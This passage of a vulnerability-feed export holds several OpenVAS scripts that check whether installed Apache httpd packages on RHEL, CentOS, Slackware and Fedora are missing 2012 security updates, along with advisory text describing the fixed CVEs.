full HTTP header line in the default error\n page generated when receiving an excessively long or malformed header.\n Malicious JavaScript running in the server's domain context could use this\n flaw to gain access to httpOnly cookies. (CVE-2012-0053)\n\n An integer overflow flaw, leading to a heap-based buffer overflow, was\n found in the way httpd performed substitutions in regular expressions. An\n attacker able to set certain httpd settings, such as a user permitted to\n override the httpd configuration for a specific directory using a\n '.htaccess' file, could use this flaw to crash the httpd child process or,\n possibly, execute arbitrary code with the privileges of the 'apache' user.\n (CVE-2011-3607)\n\n A flaw was found in the way httpd handled child process status information.\n A malicious program running with httpd child process privileges (such as a\n PHP or CGI script) could use this flaw to cause the parent httpd process to\n crash during httpd service shutdown. (CVE-2012-0031)\n\n All httpd users should upgrade to these updated packages, which contain\n backported patches to correct these issues. After installing the updated\n packages, the httpd daemon will be restarted automatically.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"RHENT_6\")\n{\n\n if ((res = isrpmvuln(pkg:\"httpd\", rpm:\"httpd~2.2.15~15.el6_2.1\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-debuginfo\", rpm:\"httpd-debuginfo~2.2.15~15.el6_2.1\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-devel\", rpm:\"httpd-devel~2.2.15~15.el6_2.1\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-tools\", rpm:\"httpd-tools~2.2.15~15.el6_2.1\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mod_ssl\", rpm:\"mod_ssl~2.2.15~15.el6_2.1\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-manual\", rpm:\"httpd-manual~2.2.15~15.el6_2.1\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T18:39:05", "description": "The remote host is missing an update as announced\nvia advisory SSA:2012-041-01.", "cvss3": {}, "published": "2012-09-10T00:00:00", "type": "openvas", "title": "Slackware Advisory SSA:2012-041-01 httpd", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-4317", "CVE-2011-3607", "CVE-2012-0031", "CVE-2012-0053", "CVE-2012-0021", "CVE-2011-3368"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:136141256231071965", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231071965", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: esoft_slk_ssa_2012_041_01.nasl 14202 2019-03-15 09:16:15Z cfischer $\n# Description: Auto-generated from advisory SSA:2012-041-01\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.71965\");\n script_cve_id(\"CVE-2011-3368\", \"CVE-2011-3607\", \"CVE-2011-4317\", \"CVE-2012-0021\", \"CVE-2012-0031\", \"CVE-2012-0053\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_version(\"$Revision: 14202 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 10:16:15 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-09-10 07:16:18 -0400 (Mon, 10 Sep 2012)\");\n script_name(\"Slackware Advisory SSA:2012-041-01 httpd\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Slackware Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/slackware_linux\", \"ssh/login/slackpack\", re:\"ssh/login/release=SLK(12\\.0|12\\.1|12\\.2|13\\.0|13\\.1|13\\.37)\");\n\n script_xref(name:\"URL\", value:\"https://secure1.securityspace.com/smysecure/catid.html?in=SSA:2012-041-01\");\n\n script_tag(name:\"insight\", value:\"New httpd packages are available for Slackware 12.0, 12.1, 12.2, 13.0, 13.1,\n13.37, and -current to fix security issues. The apr-util package has also been\nupdated to the latest version.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to the new package(s).\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update as announced\nvia advisory SSA:2012-041-01.\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-slack.inc\");\n\nreport = \"\";\nres = \"\";\n\nif((res = isslkpkgvuln(pkg:\"apr-util\", ver:\"1.4.1-i486-1_slack12.0\", rls:\"SLK12.0\")) != NULL) {\n report += res;\n}\nif((res = isslkpkgvuln(pkg:\"httpd\", ver:\"2.2.22-i486-1_slack12.0\", rls:\"SLK12.0\")) != NULL) {\n report += res;\n}\nif((res = isslkpkgvuln(pkg:\"apr-util\", ver:\"1.4.1-i486-1_slack12.1\", rls:\"SLK12.1\")) != NULL) {\n report += res;\n}\nif((res = isslkpkgvuln(pkg:\"httpd\", ver:\"2.2.22-i486-1_slack12.1\", rls:\"SLK12.1\")) != NULL) {\n report += res;\n}\nif((res = isslkpkgvuln(pkg:\"apr-util\", ver:\"1.4.1-i486-1_slack12.2\", rls:\"SLK12.2\")) != NULL) {\n report += res;\n}\nif((res = isslkpkgvuln(pkg:\"httpd\", ver:\"2.2.22-i486-1_slack12.2\", rls:\"SLK12.2\")) != NULL) {\n report += res;\n}\nif((res = isslkpkgvuln(pkg:\"apr-util\", ver:\"1.4.1-i486-1_slack13.0\", rls:\"SLK13.0\")) != NULL) {\n report += res;\n}\nif((res = isslkpkgvuln(pkg:\"httpd\", ver:\"2.2.22-i486-1_slack13.0\", rls:\"SLK13.0\")) != NULL) {\n report += res;\n}\nif((res = isslkpkgvuln(pkg:\"apr-util\", ver:\"1.4.1-i486-1_slack13.1\", rls:\"SLK13.1\")) != NULL) {\n report += res;\n}\nif((res = isslkpkgvuln(pkg:\"httpd\", ver:\"2.2.22-i486-1_slack13.1\", rls:\"SLK13.1\")) != NULL) {\n report += res;\n}\nif((res = isslkpkgvuln(pkg:\"apr-util\", ver:\"1.4.1-i486-1_slack13.37\", rls:\"SLK13.37\")) != NULL) {\n report += res;\n}\nif((res = isslkpkgvuln(pkg:\"httpd\", ver:\"2.2.22-i486-1_slack13.37\", rls:\"SLK13.37\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2018-01-06T13:06:47", "description": "Check for the Version of httpd", "cvss3": {}, "published": "2012-07-09T00:00:00", "type": "openvas", "title": "RedHat Update for httpd RHSA-2012:0128-01", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-4317", "CVE-2011-3607", "CVE-2012-0031", "CVE-2011-3639", "CVE-2012-0053", "CVE-2011-3368"], "modified": "2018-01-05T00:00:00", "id": "OPENVAS:870631", "href": "http://plugins.openvas.org/nasl.php?oid=870631", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for httpd RHSA-2012:0128-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The Apache HTTP Server is a popular web server.\n\n It was discovered that the fix for CVE-2011-3368 (released via\n RHSA-2011:1391) did not completely address the problem. An attacker could\n bypass the fix and make a reverse proxy connect to an arbitrary server not\n directly accessible to the attacker by sending an HTTP version 0.9 request,\n or by using a specially-crafted URI. (CVE-2011-3639, CVE-2011-4317)\n\n The httpd server included the full HTTP header line in the default error\n page generated when receiving an excessively long or malformed header.\n Malicious JavaScript running in the server's domain context could use this\n flaw to gain access to httpOnly cookies. (CVE-2012-0053)\n\n An integer overflow flaw, leading to a heap-based buffer overflow, was\n found in the way httpd performed substitutions in regular expressions. An\n attacker able to set certain httpd settings, such as a user permitted to\n override the httpd configuration for a specific directory using a\n ".htaccess" file, could use this flaw to crash the httpd child process or,\n possibly, execute arbitrary code with the privileges of the "apache" user.\n (CVE-2011-3607)\n\n A flaw was found in the way httpd handled child process status information.\n A malicious program running with httpd child process privileges (such as a\n PHP or CGI script) could use this flaw to cause the parent httpd process to\n crash during httpd service shutdown. (CVE-2012-0031)\n\n All httpd users should upgrade to these updated packages, which contain\n backported patches to correct these issues. After installing the updated\n packages, the httpd daemon will be restarted automatically.\";\n\ntag_affected = \"httpd on Red Hat Enterprise Linux Desktop (v. 6),\n Red Hat Enterprise Linux Server (v. 6),\n Red Hat Enterprise Linux Workstation (v. 6)\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://www.redhat.com/archives/rhsa-announce/2012-February/msg00029.html\");\n script_id(870631);\n script_version(\"$Revision: 8295 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-05 07:29:18 +0100 (Fri, 05 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-07-09 10:37:07 +0530 (Mon, 09 Jul 2012)\");\n script_cve_id(\"CVE-2011-3607\", \"CVE-2011-3639\", \"CVE-2011-4317\", \"CVE-2012-0031\", \"CVE-2012-0053\", \"CVE-2011-3368\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_xref(name: \"RHSA\", value: \"2012:0128-01\");\n script_name(\"RedHat Update for httpd RHSA-2012:0128-01\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of httpd\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"RHENT_6\")\n{\n\n if ((res = isrpmvuln(pkg:\"httpd\", rpm:\"httpd~2.2.15~15.el6_2.1\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-debuginfo\", rpm:\"httpd-debuginfo~2.2.15~15.el6_2.1\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-devel\", rpm:\"httpd-devel~2.2.15~15.el6_2.1\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-tools\", rpm:\"httpd-tools~2.2.15~15.el6_2.1\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mod_ssl\", rpm:\"mod_ssl~2.2.15~15.el6_2.1\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-manual\", rpm:\"httpd-manual~2.2.15~15.el6_2.1\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2017-07-24T12:50:45", "description": "The remote host is missing an update as announced\nvia advisory SSA:2012-041-01.", "cvss3": {}, "published": "2012-09-10T00:00:00", "type": "openvas", "title": "Slackware Advisory SSA:2012-041-01 httpd ", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-4317", "CVE-2011-3607", "CVE-2012-0031", "CVE-2012-0053", "CVE-2012-0021", "CVE-2011-3368"], "modified": "2017-07-06T00:00:00", "id": "OPENVAS:71965", "href": "http://plugins.openvas.org/nasl.php?oid=71965", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: esoft_slk_ssa_2012_041_01.nasl 6581 2017-07-06 13:58:51Z cfischer $\n# Description: Auto-generated from advisory SSA:2012-041-01\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"New httpd packages are available for Slackware 12.0, 12.1, 12.2, 13.0, 13.1,\n13.37, and -current to fix security issues. The apr-util package has also been\nupdated to the latest version.\";\ntag_summary = \"The remote host is missing an update as announced\nvia advisory SSA:2012-041-01.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=SSA:2012-041-01\";\n \nif(description)\n{\n script_id(71965);\n script_cve_id(\"CVE-2011-3368\", \"CVE-2011-3607\", \"CVE-2011-4317\", \"CVE-2012-0021\", \"CVE-2012-0031\", \"CVE-2012-0053\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_version(\"$Revision: 6581 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-06 15:58:51 +0200 (Thu, 06 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-09-10 07:16:18 -0400 (Mon, 10 Sep 2012)\");\n script_name(\"Slackware Advisory SSA:2012-041-01 httpd \");\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Slackware Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/slackware_linux\", \"ssh/login/slackpack\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-slack.inc\");\nvuln = 0;\nif(isslkpkgvuln(pkg:\"apr-util\", ver:\"1.4.1-i486-1_slack12.0\", rls:\"SLK12.0\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"httpd\", ver:\"2.2.22-i486-1_slack12.0\", rls:\"SLK12.0\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"apr-util\", ver:\"1.4.1-i486-1_slack12.1\", rls:\"SLK12.1\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"httpd\", ver:\"2.2.22-i486-1_slack12.1\", rls:\"SLK12.1\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"apr-util\", ver:\"1.4.1-i486-1_slack12.2\", rls:\"SLK12.2\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"httpd\", ver:\"2.2.22-i486-1_slack12.2\", rls:\"SLK12.2\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"apr-util\", ver:\"1.4.1-i486-1_slack13.0\", rls:\"SLK13.0\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"httpd\", ver:\"2.2.22-i486-1_slack13.0\", rls:\"SLK13.0\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"apr-util\", ver:\"1.4.1-i486-1_slack13.1\", rls:\"SLK13.1\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"httpd\", ver:\"2.2.22-i486-1_slack13.1\", rls:\"SLK13.1\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"apr-util\", ver:\"1.4.1-i486-1_slack13.37\", rls:\"SLK13.37\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"httpd\", ver:\"2.2.22-i486-1_slack13.37\", rls:\"SLK13.37\")) {\n vuln = 1;\n}\n\nif(vuln) {\n security_message(0);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-01-02T10:57:25", "description": "Check for the Version of httpd", "cvss3": {}, "published": "2012-07-30T00:00:00", "type": "openvas", "title": "CentOS Update for httpd CESA-2012:0128 centos6 ", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-4317", "CVE-2011-3607", "CVE-2012-0031", "CVE-2011-3639", "CVE-2012-0053", "CVE-2011-3368"], "modified": "2017-12-27T00:00:00", "id": "OPENVAS:881089", "href": "http://plugins.openvas.org/nasl.php?oid=881089", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for httpd CESA-2012:0128 centos6 \n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The Apache HTTP Server is a popular web server.\n\n It was discovered that the fix for CVE-2011-3368 (released via\n RHSA-2011:1391) did not completely address the problem. An attacker could\n bypass the fix and make a reverse proxy connect to an arbitrary server not\n directly accessible to the attacker by sending an HTTP version 0.9 request,\n or by using a specially-crafted URI. (CVE-2011-3639, CVE-2011-4317)\n \n The httpd server included the full HTTP header line in the default error\n page generated when receiving an excessively long or malformed header.\n Malicious JavaScript running in the server's domain context could use this\n flaw to gain access to httpOnly cookies. (CVE-2012-0053)\n \n An integer overflow flaw, leading to a heap-based buffer overflow, was\n found in the way httpd performed substitutions in regular expressions. An\n attacker able to set certain httpd settings, such as a user permitted to\n override the httpd configuration for a specific directory using a\n ".htaccess" file, could use this flaw to crash the httpd child process or,\n possibly, execute arbitrary code with the privileges of the "apache" user.\n (CVE-2011-3607)\n \n A flaw was found in the way httpd handled child process status information.\n A malicious program running with httpd child process privileges (such as a\n PHP or CGI script) could use this flaw to cause the parent httpd process to\n crash during httpd service shutdown. (CVE-2012-0031)\n \n All httpd users should upgrade to these updated packages, which contain\n backported patches to correct these issues. After installing the updated\n packages, the httpd daemon will be restarted automatically.\";\n\ntag_affected = \"httpd on CentOS 6\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2012-February/018433.html\");\n script_id(881089);\n script_version(\"$Revision: 8249 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-27 07:29:56 +0100 (Wed, 27 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-07-30 16:05:13 +0530 (Mon, 30 Jul 2012)\");\n script_cve_id(\"CVE-2011-3607\", \"CVE-2011-3639\", \"CVE-2011-4317\", \"CVE-2012-0031\",\n \"CVE-2012-0053\", \"CVE-2011-3368\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_xref(name: \"CESA\", value: \"2012:0128\");\n script_name(\"CentOS Update for httpd CESA-2012:0128 centos6 \");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of httpd\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS6\")\n{\n\n if ((res = isrpmvuln(pkg:\"httpd\", rpm:\"httpd~2.2.15~15.el6.centos.1\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-devel\", rpm:\"httpd-devel~2.2.15~15.el6.centos.1\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-manual\", rpm:\"httpd-manual~2.2.15~15.el6.centos.1\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-tools\", rpm:\"httpd-tools~2.2.15~15.el6.centos.1\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mod_ssl\", rpm:\"mod_ssl~2.2.15~15.el6.centos.1\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-01-11T11:06:24", "description": "Check for the Version of httpd", "cvss3": {}, "published": "2012-04-02T00:00:00", "type": "openvas", "title": "Fedora Update for httpd FEDORA-2012-1598", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-4317", "CVE-2011-3607", "CVE-2012-0031", "CVE-2012-0053", "CVE-2012-0021", "CVE-2011-3368"], "modified": "2018-01-09T00:00:00", "id": "OPENVAS:863961", "href": "http://plugins.openvas.org/nasl.php?oid=863961", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for httpd FEDORA-2012-1598\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"httpd on Fedora 16\";\ntag_insight = \"The Apache HTTP Server is a powerful, efficient, and extensible\n web server.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2012-February/073489.html\");\n script_id(863961);\n script_version(\"$Revision: 8336 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-09 08:01:48 +0100 (Tue, 09 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-04-02 12:38:41 +0530 (Mon, 02 Apr 2012)\");\n script_cve_id(\"CVE-2011-3368\", \"CVE-2011-3607\", \"CVE-2011-4317\", \"CVE-2012-0021\",\n \"CVE-2012-0031\", \"CVE-2012-0053\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_xref(name: \"FEDORA\", value: \"2012-1598\");\n script_name(\"Fedora Update for httpd FEDORA-2012-1598\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of httpd\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC16\")\n{\n\n if ((res = isrpmvuln(pkg:\"httpd\", rpm:\"httpd~2.2.22~1.fc16\", rls:\"FC16\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2019-05-29T18:38:39", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2012-04-02T00:00:00", "type": "openvas", "title": "Fedora Update for httpd FEDORA-2012-1598", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-4317", "CVE-2011-3607", "CVE-2012-0031", "CVE-2012-0053", "CVE-2012-0021", "CVE-2011-3368"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310863961", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310863961", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for httpd FEDORA-2012-1598\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.fedoraproject.org/pipermail/package-announce/2012-February/073489.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.863961\");\n 